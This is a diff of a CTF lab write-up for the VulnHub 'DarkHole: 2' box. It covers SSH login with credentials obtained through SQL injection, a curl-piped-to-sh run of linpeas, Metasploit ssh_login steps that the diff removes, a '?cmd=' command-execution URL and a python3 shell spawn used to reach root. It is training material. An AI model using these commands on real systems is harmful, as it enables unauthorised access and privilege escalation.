ameyer2002/Kali-Linux-CTF-VulnHub/DarkHole:2.md

 During the scan, the injections are successful and return two tables, a user table and a ssh table.
 This worked so I can now ssh into jehad's account.
 I run the command **ssh jehad@192.168.19.129**, input the password **fool** and I'm in the account.

 Now that I have access to an account, it's time for privilege escalation.
 I switched to the tmp folder and tried to run the Linpeas script: **curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh**.
 This is a script that searches for potential paths to elevate privileges on Linux hosts and highlights them for a better understanding of those instances with potential exploits.
 This is my first time using this which was really insightful and I will definitely be using this again in other labs.
-However, I decided to use metasploit.
-I used the’s SSH auxiliary module:

-* msfconsole
-* search ssh type:auxiliary
-* use auxiliary/scanner/ssh/ssh_login
-* set USERNAME jehad
-* set PASSWORD fool
-* set RHOSTS 192.168.19.129
-* run
+In jehad's account, I eventually got into the losy directory and found one flag shown below:

+When listing the files in jehad's directory, there is a bash history file which I read and found this which created a reverse shell: **http://127.0.0.1:9999/?cmd=id**

+I encoded this command and got the password to ssh into losy's account:

+I was able to log into losy's account successfully.
+I create a more interactive shell by running **python3 -c 'import os; os.system("/bin/sh")'**.
+I then used the whoami command to verify I was in the root user's account.
+I finally changed the directory I was in to the root directory which I saw the root.txt file was in.